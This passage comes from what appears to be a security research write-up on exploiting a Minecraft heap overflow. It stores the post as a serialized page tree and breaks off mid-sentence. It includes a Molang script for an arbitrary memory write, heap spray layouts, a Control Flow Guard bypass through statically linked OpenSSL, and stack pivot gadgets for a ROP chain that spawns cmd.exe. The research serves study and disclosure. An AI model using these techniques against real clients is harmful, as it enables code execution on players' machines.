+-> +------------+------------+\n                      |   |    buf     |    len     |\n      MolangIndexMap -+   +------------+------------+\n                      |   |    cap     |            |\n                   +--+-> +------------+------------+\n                   |      |    buf     |    len     |\nMolangVariableMap -+      +------------+------------+\n                   |      |    cap     |            |\n                   +----> +------------+            |\n                          |                         |\n                          +-------------------------+\n",[158875],{"type":25,"tag":82,"props":158876,"children":158877},{"__ignoreMap":7},[158878],{"type":31,"value":158873},{"type":25,"tag":38,"props":158880,"children":158881},{},[158882,158883,158888,158890,158895,158897,158902,158904,158909,158911,158916,158917,158922,158924,158929],{"type":31,"value":474},{"type":25,"tag":82,"props":158884,"children":158886},{"className":158885},[],[158887],{"type":31,"value":43115},{"type":31,"value":158889}," field inside a ",{"type":25,"tag":82,"props":158891,"children":158893},{"className":158892},[],[158894],{"type":31,"value":156530},{"type":31,"value":158896}," is at offset ",{"type":25,"tag":82,"props":158898,"children":158900},{"className":158899},[],[158901],{"type":31,"value":156791},{"type":31,"value":158903},". We already control a corrupted variable, ",{"type":25,"tag":82,"props":158905,"children":158907},{"className":158906},[],[158908],{"type":31,"value":158797},{"type":31,"value":158910},", whose target we can shift by adding unseen variables: each unseen variable increments the ",{"type":25,"tag":82,"props":158912,"children":158914},{"className":158913},[],[158915],{"type":31,"value":13094},{"type":31,"value":157838},{"type":25,"tag":82,"props":158918,"children":158920},{"className":158919},[],[158921],{"type":31,"value":157033},{"type":31,"value":158923}," by 2 bytes, which in turn advances ",{"type":25,"tag":82,"props":158925,"children":158927},{"className":158926},[],[158928],{"type":31,"value":158797},{"type":31,"value":158930}," by 2 bytes.",{"type":25,"tag":38,"props":158932,"children":158933},{},[158934,158936,158941,158943,158949,158950,158955,158956,158961,158963,158968],{"type":31,"value":158935},"By moving ",{"type":25,"tag":82,"props":158937,"children":158939},{"className":158938},[],[158940],{"type":31,"value":13094},{"type":31,"value":158942}," so it equals ",{"type":25,"tag":82,"props":158944,"children":158946},{"className":158945},[],[158947],{"type":31,"value":158948},"cap - 0x38",{"type":31,"value":106255},{"type":25,"tag":82,"props":158951,"children":158953},{"className":158952},[],[158954],{"type":31,"value":43115},{"type":31,"value":157838},{"type":25,"tag":82,"props":158957,"children":158959},{"className":158958},[],[158960],{"type":31,"value":158797},{"type":31,"value":158962}," will overlap the first 8 bytes of the adjacent heap chunk above - in our case, the entity object (manipulated by the heap spray) - which means those first 8 bytes are the entity’s ",{"type":25,"tag":82,"props":158964,"children":158966},{"className":158965},[],[158967],{"type":31,"value":158868},{"type":31,"value":158969}," pointer. We can then capture that pointer with:",{"type":25,"tag":206,"props":158971,"children":158973},{"code":158972},"variable.saved_vtable_pointer = variable.corrupted_len_ptr;\n",[158974],{"type":25,"tag":82,"props":158975,"children":158976},{"__ignoreMap":7},[158977],{"type":31,"value":158972},{"type":25,"tag":38,"props":158979,"children":158980},{},[158981,158983,158988,158990,158995,158997,159002,159004,159010],{"type":31,"value":158982},"After saving the leak, we add 27 unseen variables to advance ",{"type":25,"tag":82,"props":158984,"children":158986},{"className":158985},[],[158987],{"type":31,"value":13094},{"type":31,"value":158989}," until it equals ",{"type":25,"tag":82,"props":158991,"children":158993},{"className":158992},[],[158994],{"type":31,"value":158734},{"type":31,"value":158996},". That produces the setup required for our arbitrary read/write primitive while having the leaked ",{"type":25,"tag":82,"props":158998,"children":159000},{"className":158999},[],[159001],{"type":31,"value":158868},{"type":31,"value":159003}," address in ",{"type":25,"tag":82,"props":159005,"children":159007},{"className":159006},[],[159008],{"type":31,"value":159009},"variable.saved_vtable_pointer",{"type":31,"value":179},{"type":25,"tag":22753,"props":159012,"children":159013},{},[],{"type":25,"tag":38,"props":159015,"children":159016},{},[159017,159019,159024,159026,159032],{"type":31,"value":159018},"A Molang script that performs an arbitrary write of the value ",{"type":25,"tag":82,"props":159020,"children":159022},{"className":159021},[],[159023],{"type":31,"value":47468},{"type":31,"value":159025}," to the address ",{"type":25,"tag":82,"props":159027,"children":159029},{"className":159028},[],[159030],{"type":31,"value":159031},"vtable + 0x1000",{"type":31,"value":159033}," looks like this:",{"type":25,"tag":206,"props":159035,"children":159037},{"code":159036},"// calculate lower 16\nvariable.corrupted_len_ptr = variable.saved_vtable_lower_16;\nvariable.corrupted_cap_ptr = 0;\n// subtract the offset of `value` field within MolangVariable (0x38)\nvariable.corrupted_len_ptr = variable.corrupted_len_ptr + itof(0x1000 - 0x38);\nvariable.calculated_lower_16 = variable.corrupted_len_ptr;\n\n// calculate middle 16, check if lower 16 calculation overflows\nvariable.corrupted_len_ptr = variable.saved_vtable_middle_16;\nvariable.corrupted_cap_ptr = 0;\n(variable.calculated_lower_16 >= itof(0x10000)) ? {\n    variable.corrupted_len_ptr = variable.corrupted_len_ptr + itof(0x1);\n};\nvariable.calculated_middle_16 = variable.corrupted_len_ptr;\n\n// calculate high 16, check if middle 16 calculation overflows\nvariable.corrupted_len_ptr = variable.saved_vtable_high_16;\nvariable.corrupted_cap_ptr = 0;\n(variable.calculated_middle_16 >= itof(0x10000)) ? {\n    variable.corrupted_len_ptr = variable.corrupted_len_ptr + itof(0x1);\n};\nvariable.calculated_high_16 = variable.corrupted_len_ptr;\n\n// construct the final pointer\nvariable.corrupted_len_ptr = variable.calculated_middle_16;\nvariable.corrupted_cap_ptr = variable.calculated_high_16;\nvariable.calculated_upper_48 = variable.corrupted_len_ptr;\nvariable.corrupted_len_ptr = variable.calculated_lower_16;\nvariable.corrupted_cap_ptr = variable.calculated_upper_48;\n\n// copy the constructed pointer to MolangVariableMap\nvariable.corrupted_var_map_ptr = variable.corrupted_len_ptr;\n\n// variable.f pointer is now `vtable + 0x1000 - 0x38`\n// and the value 0x1337 is written at `vtable + 0x1000`\nvariable.f = itof(0x1337);\n",[159038],{"type":25,"tag":82,"props":159039,"children":159040},{"__ignoreMap":7},[159041],{"type":31,"value":159036},{"type":25,"tag":630,"props":159043,"children":159045},{"id":159044},"required-heap-layout",[159046],{"type":31,"value":159047},"Required Heap Layout",{"type":25,"tag":38,"props":159049,"children":159050},{},[159051],{"type":31,"value":159052},"To ensure our attack works, the heap spray would manipulate the layout as such once the indices are overwritten:",{"type":25,"tag":206,"props":159054,"children":159056},{"code":159055},"    Heap Region 1                Heap Region 2    \n                                                  \n+-------------------+        +-------------------+\n|                   |        |                   |\n| MolangVariableMap |        |  MolangIndexMap   |\n|                   |        |                   |\n+-------------------+        +-------------------+\n|                   |        |                   |\n|   Entity Object   |        |   Entity Object   |\n|                   |        |                   |\n+-------------------+        +-------------------+\n|                   |        |                   |\n| MolangVariableMap |        |  MolangIndexMap   |\n|                   |        |                   |\n+-------------------+        +-------------------+\n|                   |        |                   |\n|   Entity Object   |        |   Entity Object   |\n|                   |        |                   |\n+-------------------+        +-------------------+\n",[159057],{"type":25,"tag":82,"props":159058,"children":159059},{"__ignoreMap":7},[159060],{"type":31,"value":159055},{"type":25,"tag":38,"props":159062,"children":159063},{},[159064,159066,159072,159074,159079,159081,159086,159088,159093,159094,159099],{"type":31,"value":159065},"The first region (",{"type":25,"tag":82,"props":159067,"children":159069},{"className":159068},[],[159070],{"type":31,"value":159071},"Heap Region 1",{"type":31,"value":159073},") contains alternating ",{"type":25,"tag":82,"props":159075,"children":159077},{"className":159076},[],[159078],{"type":31,"value":156857},{"type":31,"value":159080},"-allocated buffers and entity objects. The purpose of this region is that, once a variable index is out of bounds, it can index internal ",{"type":25,"tag":82,"props":159082,"children":159084},{"className":159083},[],[159085],{"type":31,"value":156887},{"type":31,"value":159087}," pointers of ",{"type":25,"tag":82,"props":159089,"children":159091},{"className":159090},[],[159092],{"type":31,"value":156857},{"type":31,"value":1307},{"type":25,"tag":82,"props":159095,"children":159097},{"className":159096},[],[159098],{"type":31,"value":157033},{"type":31,"value":159100}," from the entity object for our main attack.",{"type":25,"tag":38,"props":159102,"children":159103},{},[159104,159106,159112,159114,159119,159121,159126,159128,159133,159135,159140],{"type":31,"value":159105},"The second region (",{"type":25,"tag":82,"props":159107,"children":159109},{"className":159108},[],[159110],{"type":31,"value":159111},"Heap Region 2",{"type":31,"value":159113},") contains interleaved ",{"type":25,"tag":82,"props":159115,"children":159117},{"className":159116},[],[159118],{"type":31,"value":157033},{"type":31,"value":159120},"-allocated buffers and entity objects. This region exists so we can leak an entity object's ",{"type":25,"tag":82,"props":159122,"children":159124},{"className":159123},[],[159125],{"type":31,"value":158868},{"type":31,"value":159127}," pointer into ",{"type":25,"tag":82,"props":159129,"children":159131},{"className":159130},[],[159132],{"type":31,"value":158797},{"type":31,"value":159134}," during our main attack. It could be any object with a ",{"type":25,"tag":82,"props":159136,"children":159138},{"className":159137},[],[159139],{"type":31,"value":158868},{"type":31,"value":159141},", but for simplicity we use the entity object.",{"type":25,"tag":38,"props":159143,"children":159144},{},[159145,159147,159153,159155,159160],{"type":31,"value":159146},"During the attack, overwriting another variable's pointer with\n",{"type":25,"tag":82,"props":159148,"children":159150},{"className":159149},[],[159151],{"type":31,"value":159152},"variable.corrupted_var_map_ptr = variable.corrupted_len_ptr",{"type":31,"value":159154}," will very likely clobber the ",{"type":25,"tag":82,"props":159156,"children":159158},{"className":159157},[],[159159],{"type":31,"value":157353},{"type":31,"value":159161}," pointer of a different entity than the one subject to the initial index corruption. In practice this means: an entity affected by the initial corruption will leak and compute an arbitrary read/write address, then use that address to overwrite a variable pointer in a second, separate entity. The second entity is then used purely to perform arbitrary reads and writes via that variable.",{"type":25,"tag":38,"props":159163,"children":159164},{},[159165],{"type":31,"value":159166},"Because of this cross-entity behavior, we must synchronize all entities. At the time we implemented the exploit we couldn't find a clean way to force synchronized execution. Our workaround was to place all allocated entities at the same world position and put the Molang script into the animation section. Animation scripts are not executed for entities outside the client's field of view, so none of the Molang code runs until the entities become visible.",{"type":25,"tag":38,"props":159168,"children":159169},{},[159170],{"type":31,"value":159171},"The final exploit proceeds in three stages:",{"type":25,"tag":6711,"props":159173,"children":159174},{},[159175,159180,159185],{"type":25,"tag":2043,"props":159176,"children":159177},{},[159178],{"type":31,"value":159179},"Position the player so the sprayed entities are out of view (their Molang scripts remain dormant)",{"type":25,"tag":2043,"props":159181,"children":159182},{},[159183],{"type":31,"value":159184},"Perform the heap spray with signs to create the desired layout for the attack",{"type":25,"tag":2043,"props":159186,"children":159187},{},[159188],{"type":31,"value":159189},"Move the client so all sprayed entities enter the field of view - their animation scripts (our Molang payload) then execute, triggering the leak and the subsequent arbitrary read/write primitive.",{"type":25,"tag":630,"props":159191,"children":159193},{"id":159192},"initial-corruption-variant-lfh-heap-approach",[159194],{"type":31,"value":159195},"Initial Corruption Variant: LFH Heap Approach",{"type":25,"tag":38,"props":159197,"children":159198},{},[159199],{"type":31,"value":159200},"As mentioned above, LFH heap chunks have no headers and chunk data is adjacent, so the attack can also be carried out in the LFH heap instead of the VS heap. In that case the chunk overlap method is unnecessary - the overflown 4-byte value can be used directly to overwrite the first two variable indices.",{"type":25,"tag":38,"props":159202,"children":159203},{},[159204,159206,159211,159212,159218],{"type":31,"value":159205},"There is no variable at index 0 in the global variable map because when a new variable is encountered it is assigned ",{"type":25,"tag":82,"props":159207,"children":159209},{"className":159208},[],[159210],{"type":31,"value":157100},{"type":31,"value":10439},{"type":25,"tag":82,"props":159213,"children":159215},{"className":159214},[],[159216],{"type":31,"value":159217},"last_index",{"type":31,"value":159219}," is initialized to 0 at program start. Therefore the first two bytes of the 4-byte overflow are irrelevant - only the last two bytes overwrite a single variable index.",{"type":25,"tag":38,"props":159221,"children":159222},{},[159223,159225,159230,159231,159236,159238,159243,159245,159250,159252,159257,159259,159265,159266,159272,159273,159279],{"type":31,"value":159224},"The main attack can be arranged by making the resulting index point at the ",{"type":25,"tag":82,"props":159226,"children":159228},{"className":159227},[],[159229],{"type":31,"value":154053},{"type":31,"value":157838},{"type":25,"tag":82,"props":159232,"children":159234},{"className":159233},[],[159235],{"type":31,"value":157033},{"type":31,"value":159237},". From there, the script can overwrite three variable indices at offset ",{"type":25,"tag":82,"props":159239,"children":159241},{"className":159240},[],[159242],{"type":31,"value":156791},{"type":31,"value":159244}," within the ",{"type":25,"tag":82,"props":159246,"children":159248},{"className":159247},[],[159249],{"type":31,"value":157033},{"type":31,"value":159251}," by using the string type. This works because a Molang string's value is just a ",{"type":25,"tag":82,"props":159253,"children":159255},{"className":159254},[],[159256],{"type":31,"value":59603},{"type":31,"value":159258}," FNV-1 hash; the required string can be found by brute-forcing until the hash contains the three target indices. For example, to overwrite three indices with values ",{"type":25,"tag":82,"props":159260,"children":159262},{"className":159261},[],[159263],{"type":31,"value":159264},"0xfb",{"type":31,"value":7026},{"type":25,"tag":82,"props":159267,"children":159269},{"className":159268},[],[159270],{"type":31,"value":159271},"0xfc",{"type":31,"value":1307},{"type":25,"tag":82,"props":159274,"children":159276},{"className":159275},[],[159277],{"type":31,"value":159278},"0xfd",{"type":31,"value":159280}," the script would do:",{"type":25,"tag":206,"props":159282,"children":159284},{"code":159283},"variable.corrupted_index_map_ptr = 'r80n3jsuc';\n",[159285],{"type":25,"tag":82,"props":159286,"children":159287},{"__ignoreMap":7},[159288],{"type":31,"value":159283},{"type":25,"tag":38,"props":159290,"children":159291},{},[159292,159294,159299,159300,159306,159308,159313],{"type":31,"value":159293},"That line would write the ",{"type":25,"tag":82,"props":159295,"children":159297},{"className":159296},[],[159298],{"type":31,"value":59603},{"type":31,"value":96144},{"type":25,"tag":82,"props":159301,"children":159303},{"className":159302},[],[159304],{"type":31,"value":159305},"0x302700fb00fc00fd",{"type":31,"value":159307}," (string's FNV-1 hash) into the allocated ",{"type":25,"tag":82,"props":159309,"children":159311},{"className":159310},[],[159312],{"type":31,"value":157033},{"type":31,"value":159314}," buffer, overwriting three indices with the required values and setting up the desired arbitrary read / write primitive state.",{"type":25,"tag":606,"props":159316,"children":159318},{"id":159317},"hijacking-execution",[159319],{"type":31,"value":159320},"Hijacking Execution",{"type":25,"tag":38,"props":159322,"children":159323},{},[159324,159326,159331,159333,159339],{"type":31,"value":159325},"Although we can read and write arbitrary values inside the Minecraft memory region - including many ",{"type":25,"tag":82,"props":159327,"children":159329},{"className":159328},[],[159330],{"type":31,"value":158868},{"type":31,"value":159332}," and function pointers in the writable ",{"type":25,"tag":82,"props":159334,"children":159336},{"className":159335},[],[159337],{"type":31,"value":159338},".data",{"type":31,"value":159340}," section - the exploit is not complete: Control Flow Guard (CFG) prevents us from gaining arbitrary code execution by overwriting those pointers and executing a ROP chain.",{"type":25,"tag":38,"props":159342,"children":159343},{},[159344],{"type":31,"value":159345},"CFG is a runtime mitigation that blocks indirect jumps/calls to unapproved addresses; it will crash on an indirect transfer to a location not in its valid-target set.",{"type":25,"tag":38,"props":159347,"children":159348},{},[159349],{"type":31,"value":159350},"Examining Minecraft-specific functions and their disassembly shows the following:",{"type":25,"tag":38,"props":159352,"children":159353},{},[159354],{"type":25,"tag":6467,"props":159355,"children":159357},{"alt":54547,"src":159356},"/posts/minecraft-heap-overflow-to-rce/image11.png",[],{"type":25,"tag":38,"props":159359,"children":159360},{},[159361,159363,159369,159371,159377,159379,159384,159386,159391,159393,159399,159401,159406,159408,159414,159416,159421],{"type":31,"value":159362},"This snippet calls a method on an object: ",{"type":25,"tag":82,"props":159364,"children":159366},{"className":159365},[],[159367],{"type":31,"value":159368},"rcx",{"type":31,"value":159370}," holds the object pointer, the first ",{"type":25,"tag":82,"props":159372,"children":159374},{"className":159373},[],[159375],{"type":31,"value":159376},"mov",{"type":31,"value":159378}," loads the object's ",{"type":25,"tag":82,"props":159380,"children":159382},{"className":159381},[],[159383],{"type":31,"value":158868},{"type":31,"value":159385}," into ",{"type":25,"tag":82,"props":159387,"children":159389},{"className":159388},[],[159390],{"type":31,"value":60742},{"type":31,"value":159392},", and the function pointer at ",{"type":25,"tag":82,"props":159394,"children":159396},{"className":159395},[],[159397],{"type":31,"value":159398},"rax + 0x8",{"type":31,"value":159400}," is read into ",{"type":25,"tag":82,"props":159402,"children":159404},{"className":159403},[],[159405],{"type":31,"value":60742},{"type":31,"value":159407},". Finally, ",{"type":25,"tag":82,"props":159409,"children":159411},{"className":159410},[],[159412],{"type":31,"value":159413},"__guard_dispatch_icall_fptr",{"type":31,"value":159415}," is called - this is the CFG dispatch function that validates ",{"type":25,"tag":82,"props":159417,"children":159419},{"className":159418},[],[159420],{"type":31,"value":60742},{"type":31,"value":159422}," as a legal call target before invoking it.",{"type":25,"tag":38,"props":159424,"children":159425},{},[159426],{"type":31,"value":159427},"All DLLs in the Minecraft directory are compiled with CFG. However, we later found an assembly snippet in the Minecraft executable that calls an object method directly, without a CFG dispatch:",{"type":25,"tag":38,"props":159429,"children":159430},{},[159431],{"type":25,"tag":6467,"props":159432,"children":159434},{"alt":54547,"src":159433},"/posts/minecraft-heap-overflow-to-rce/image12.png",[],{"type":25,"tag":38,"props":159436,"children":159437},{},[159438,159440,159446,159448,159454],{"type":31,"value":159439},"Here, the function pointer at ",{"type":25,"tag":82,"props":159441,"children":159443},{"className":159442},[],[159444],{"type":31,"value":159445},"vtable + 0x10",{"type":31,"value":159447}," is loaded into ",{"type":25,"tag":82,"props":159449,"children":159451},{"className":159450},[],[159452],{"type":31,"value":159453},"rdx",{"type":31,"value":159455}," and then called directly.",{"type":25,"tag":38,"props":159457,"children":159458},{},[159459],{"type":31,"value":159460},"This code comes from OpenSSL, and none of the OpenSSL-specific sections contain CFG dispatch calls. Presumably OpenSSL was compiled without CFG and then statically linked into the executable.",{"type":25,"tag":38,"props":159462,"children":159463},{},[159464,159466,159471],{"type":31,"value":159465},"So the remaining task is to locate OpenSSL function or ",{"type":25,"tag":82,"props":159467,"children":159469},{"className":159468},[],[159470],{"type":31,"value":158868},{"type":31,"value":159472}," pointers within Minecraft's writable sections and use those as overwrite targets to hijack execution.",{"type":25,"tag":630,"props":159474,"children":159476},{"id":159475},"locating-overwrite-targets",[159477],{"type":31,"value":159478},"Locating Overwrite Targets",{"type":25,"tag":38,"props":159480,"children":159481},{},[159482,159484,159490,159491,159496,159498,159503,159505,159511],{"type":31,"value":159483},"One of the first targets we identified were the ",{"type":25,"tag":82,"props":159485,"children":159487},{"className":159486},[],[159488],{"type":31,"value":159489},"malloc",{"type":31,"value":1307},{"type":25,"tag":82,"props":159492,"children":159494},{"className":159493},[],[159495],{"type":31,"value":154101},{"type":31,"value":159497}," callbacks. These reside in the ",{"type":25,"tag":82,"props":159499,"children":159501},{"className":159500},[],[159502],{"type":31,"value":159338},{"type":31,"value":159504}," section and are invoked whenever they don’t match the expected ",{"type":25,"tag":82,"props":159506,"children":159508},{"className":159507},[],[159509],{"type":31,"value":159510},"OPENSSL_malloc/free",{"type":31,"value":135962},{"type":25,"tag":38,"props":159513,"children":159514},{},[159515],{"type":25,"tag":6467,"props":159516,"children":159518},{"alt":54547,"src":159517},"/posts/minecraft-heap-overflow-to-rce/image13.png",[],{"type":25,"tag":38,"props":159520,"children":159521},{},[159522],{"type":31,"value":159523},"However, none of the registers held a pointer to a controllable region where we could place our ROP chain.",{"type":25,"tag":38,"props":159525,"children":159526},{},[159527,159529,159535,159537,159543,159545,159550],{"type":31,"value":159528},"Later, we found another promising function: ",{"type":25,"tag":82,"props":159530,"children":159532},{"className":159531},[],[159533],{"type":31,"value":159534},"ossl_ec_key_new_method_int",{"type":31,"value":159536},". This function creates and initializes an ",{"type":25,"tag":82,"props":159538,"children":159540},{"className":159539},[],[159541],{"type":31,"value":159542},"EC_KEY",{"type":31,"value":159544}," object. What makes it particularly interesting is that it relies on a global structure (in ",{"type":25,"tag":82,"props":159546,"children":159548},{"className":159547},[],[159549],{"type":31,"value":159338},{"type":31,"value":159551},") containing function pointers:",{"type":25,"tag":38,"props":159553,"children":159554},{},[159555],{"type":25,"tag":6467,"props":159556,"children":159558},{"alt":54547,"src":159557},"/posts/minecraft-heap-overflow-to-rce/image14.png",[],{"type":25,"tag":38,"props":159560,"children":159561},{},[159562,159564,159570,159571,159577,159579,159584,159586,159592,159594,159599,159601,159606,159608,159613],{"type":31,"value":159563},"In the image above, ",{"type":25,"tag":82,"props":159565,"children":159567},{"className":159566},[],[159568],{"type":31,"value":159569},"ret->meth",{"type":31,"value":129426},{"type":25,"tag":82,"props":159572,"children":159574},{"className":159573},[],[159575],{"type":31,"value":159576},"default_ec_key_meth",{"type":31,"value":159578},", which points to a structure of function pointers located in ",{"type":25,"tag":82,"props":159580,"children":159582},{"className":159581},[],[159583],{"type":31,"value":159338},{"type":31,"value":159585},". It then calls ",{"type":25,"tag":82,"props":159587,"children":159589},{"className":159588},[],[159590],{"type":31,"value":159591},"ret->meth->init",{"type":31,"value":159593},", passing the ",{"type":25,"tag":82,"props":159595,"children":159597},{"className":159596},[],[159598],{"type":31,"value":21651},{"type":31,"value":159600}," pointer (",{"type":25,"tag":82,"props":159602,"children":159604},{"className":159603},[],[159605],{"type":31,"value":14946},{"type":31,"value":159607},"). This alone isn’t especially useful because ",{"type":25,"tag":82,"props":159609,"children":159611},{"className":159610},[],[159612],{"type":31,"value":14946},{"type":31,"value":159614}," is heap-allocated.",{"type":25,"tag":38,"props":159616,"children":159617},{},[159618,159620,159625],{"type":31,"value":159619},"But, if we look at how ",{"type":25,"tag":82,"props":159621,"children":159623},{"className":159622},[],[159624],{"type":31,"value":159591},{"type":31,"value":159626}," is invoked in the disassembly:",{"type":25,"tag":38,"props":159628,"children":159629},{},[159630],{"type":25,"tag":6467,"props":159631,"children":159633},{"alt":54547,"src":159632},"/posts/minecraft-heap-overflow-to-rce/image15.png",[],{"type":25,"tag":38,"props":159635,"children":159636},{},[159637,159638,159643,159645,159650,159652,159657,159659,159664,159666,159671,159673,159678,159680,159685,159687,159693],{"type":31,"value":11431},{"type":25,"tag":82,"props":159639,"children":159641},{"className":159640},[],[159642],{"type":31,"value":159591},{"type":31,"value":159644}," is not ",{"type":25,"tag":82,"props":159646,"children":159648},{"className":159647},[],[159649],{"type":31,"value":58464},{"type":31,"value":159651},", it is called while ",{"type":25,"tag":82,"props":159653,"children":159655},{"className":159654},[],[159656],{"type":31,"value":60742},{"type":31,"value":159658}," still contains the value of ",{"type":25,"tag":82,"props":159660,"children":159662},{"className":159661},[],[159663],{"type":31,"value":159569},{"type":31,"value":159665}," - that is, a pointer to the structure in ",{"type":25,"tag":82,"props":159667,"children":159669},{"className":159668},[],[159670],{"type":31,"value":159338},{"type":31,"value":159672}," that we control. This is ideal, because we can overwrite ",{"type":25,"tag":82,"props":159674,"children":159676},{"className":159675},[],[159677],{"type":31,"value":159576},{"type":31,"value":159679}," with a pointer to a region in ",{"type":25,"tag":82,"props":159681,"children":159683},{"className":159682},[],[159684],{"type":31,"value":159338},{"type":31,"value":159686}," where our ROP chain is located, and then perform a stack pivot using a ",{"type":25,"tag":82,"props":159688,"children":159690},{"className":159689},[],[159691],{"type":31,"value":159692},"mov rsp, rax; ret",{"type":31,"value":159694},"-style gadget.",{"type":25,"tag":38,"props":159696,"children":159697},{},[159698,159700,159705,159707,159712],{"type":31,"value":159699},"Although we discovered that ",{"type":25,"tag":82,"props":159701,"children":159703},{"className":159702},[],[159704],{"type":31,"value":159534},{"type":31,"value":159706}," is never called by the Minecraft process, this did not turn out to be a problem as we had already found a way to trigger arbitrary function calls through the ",{"type":25,"tag":82,"props":159708,"children":159710},{"className":159709},[],[159711],{"type":31,"value":159510},{"type":31,"value":159713}," callbacks.",{"type":25,"tag":630,"props":159715,"children":159717},{"id":159716},"stack-pivot",[159718],{"type":31,"value":159719},"Stack Pivot",{"type":25,"tag":38,"props":159721,"children":159722},{},[159723,159725,159730,159732,159737,159739,159744,159746,159752],{"type":31,"value":159724},"At this point, the plan is as follows: write our ROP chain into a controlled region of ",{"type":25,"tag":82,"props":159726,"children":159728},{"className":159727},[],[159729],{"type":31,"value":159338},{"type":31,"value":159731},", overwrite ",{"type":25,"tag":82,"props":159733,"children":159735},{"className":159734},[],[159736],{"type":31,"value":159576},{"type":31,"value":159738}," to set up the stack pivot, and finally overwrite one of the callbacks so that calling it triggers ",{"type":25,"tag":82,"props":159740,"children":159742},{"className":159741},[],[159743],{"type":31,"value":159534},{"type":31,"value":159745},". This ultimately calls ",{"type":25,"tag":82,"props":159747,"children":159749},{"className":159748},[],[159750],{"type":31,"value":159751},"default_ec_key_meth->init",{"type":31,"value":159753},", which executes the pivot and begins ROP execution.",{"type":25,"tag":38,"props":159755,"children":159756},{},[159757,159759,159765,159767,159773],{"type":31,"value":159758},"We chose to overwrite the ",{"type":25,"tag":82,"props":159760,"children":159762},{"className":159761},[],[159763],{"type":31,"value":159764},"OPENSSL_free",{"type":31,"value":159766}," callback. This produces only a minor memory leak, while overwriting ",{"type":25,"tag":82,"props":159768,"children":159770},{"className":159769},[],[159771],{"type":31,"value":159772},"OPENSSL_malloc",{"type":31,"value":159774}," would require our replacement function to return a writable, unused memory region.",{"type":25,"tag":38,"props":159776,"children":159777},{},[159778,159780,159786,159787,159793,159795,159800],{"type":31,"value":159779},"For the stack pivot, we found two useful gadgets: ",{"type":25,"tag":82,"props":159781,"children":159783},{"className":159782},[],[159784],{"type":31,"value":159785},"add rsp, 0x10; pop r14; ret",{"type":31,"value":1307},{"type":25,"tag":82,"props":159788,"children":159790},{"className":159789},[],[159791],{"type":31,"value":159792},"xchg rsp, rax; ret",{"type":31,"value":159794},". The exploit writes them into ",{"type":25,"tag":82,"props":159796,"children":159798},{"className":159797},[],[159799],{"type":31,"value":159338},{"type":31,"value":159801}," like this:",{"type":25,"tag":206,"props":159803,"children":159805},{"code":159804},"      +-----------------------------+\n+0x00 | add rsp, 0x10; pop r14; ret |\n      +-----------------------------+\n+0x08 | padding                     |\n      +-----------------------------+\n+0x10 | xchg rsp, rax; ret          |\n      +-----------------------------+\n+0x18 | padding (pop r14)           |\n      +-----------------------------+\n+0x20 | ROP Chain                   |\n      +-----------------------------+\n",[159806],{"type":25,"tag":82,"props":159807,"children":159808},{"__ignoreMap":7},[159809],{"type":31,"value":159804},{"type":25,"tag":38,"props":159811,"children":159812},{},[159813,159815,159820,159822,159827,159829,159834,159836,159841,159843,159848,159850,159855,159857,159862],{"type":31,"value":159814},"The second gadget, ",{"type":25,"tag":82,"props":159816,"children":159818},{"className":159817},[],[159819],{"type":31,"value":159792},{"type":31,"value":159821},", is placed in the slot corresponding to the ",{"type":25,"tag":82,"props":159823,"children":159825},{"className":159824},[],[159826],{"type":31,"value":24700},{"type":31,"value":159828}," function pointer. As mentioned earlier, when ",{"type":25,"tag":82,"props":159830,"children":159832},{"className":159831},[],[159833],{"type":31,"value":159591},{"type":31,"value":159835}," is called, ",{"type":25,"tag":82,"props":159837,"children":159839},{"className":159838},[],[159840],{"type":31,"value":60742},{"type":31,"value":159842}," contains a pointer to ",{"type":25,"tag":82,"props":159844,"children":159846},{"className":159845},[],[159847],{"type":31,"value":159576},{"type":31,"value":159849}," - which we have overwritten and now points to our ",{"type":25,"tag":82,"props":159851,"children":159853},{"className":159852},[],[159854],{"type":31,"value":159785},{"type":31,"value":159856}," gadget in ",{"type":25,"tag":82,"props":159858,"children":159860},{"className":159859},[],[159861],{"type":31,"value":159338},{"type":31,"value":179},{"type":25,"tag":38,"props":159864,"children":159865},{},[159866,159868,159874,159876,159881,159883,159889,159891,159896,159898,159903,159905,159910,159912,159917,159919,159924,159926,159931],{"type":31,"value":159867},"When the call occurs, ",{"type":25,"tag":82,"props":159869,"children":159871},{"className":159870},[],[159872],{"type":31,"value":159873},"xchg rsp, rax",{"type":31,"value":159875}," swaps the stack pointer with this controlled pointer inside ",{"type":25,"tag":82,"props":159877,"children":159879},{"className":159878},[],[159880],{"type":31,"value":159338},{"type":31,"value":159882},", effectively moving ",{"type":25,"tag":82,"props":159884,"children":159886},{"className":159885},[],[159887],{"type":31,"value":159888},"rsp",{"type":31,"value":159890}," into our ROP region. After the ",{"type":25,"tag":82,"props":159892,"children":159894},{"className":159893},[],[159895],{"type":31,"value":14946},{"type":31,"value":159897},", execution continues at ",{"type":25,"tag":82,"props":159899,"children":159901},{"className":159900},[],[159902],{"type":31,"value":159785},{"type":31,"value":159904},", which advances ",{"type":25,"tag":82,"props":159906,"children":159908},{"className":159907},[],[159909],{"type":31,"value":159888},{"type":31,"value":159911}," by ",{"type":25,"tag":82,"props":159913,"children":159915},{"className":159914},[],[159916],{"type":31,"value":48501},{"type":31,"value":159918}," bytes, skipping over the padding and the ",{"type":25,"tag":82,"props":159920,"children":159922},{"className":159921},[],[159923],{"type":31,"value":159792},{"type":31,"value":159925}," gadget. From there, the stack pivot is complete and the ROP chain (placed above ",{"type":25,"tag":82,"props":159927,"children":159929},{"className":159928},[],[159930],{"type":31,"value":159792},{"type":31,"value":159932},") begins executing.",{"type":25,"tag":606,"props":159934,"children":159936},{"id":159935},"rop-chain",[159937],{"type":31,"value":159938},"ROP Chain",{"type":25,"tag":38,"props":159940,"children":159941},{},[159942,159944,159950,159952,159957],{"type":31,"value":159943},"For the demo, the ROP chain simply calls ",{"type":25,"tag":82,"props":159945,"children":159947},{"className":159946},[],[159948],{"type":31,"value":159949},"system(\"cmd.exe\")",{"type":31,"value":159951},". Because Minecraft does not use ",{"type":25,"tag":82,"props":159953,"children":159955},{"className":159954},[],[159956],{"type":31,"value":135684},{"type":31,"value":159958},", the symbol is not imported, so the chain must resolve it dynamically.",{"type":25,"tag":38,"props":159960,"children":159961},{},[159962,159964,159970,159972,159978,159980,159985,159987,159993,159995,160000],{"type":31,"value":159963},"This is straightforward: the chain first calls ",{"type":25,"tag":82,"props":159965,"children":159967},{"className":159966},[],[159968],{"type":31,"value":159969},"GetModuleHandle(\"ucrtbase.dll\")",{"type":31,"value":159971}," to obtain the base address of 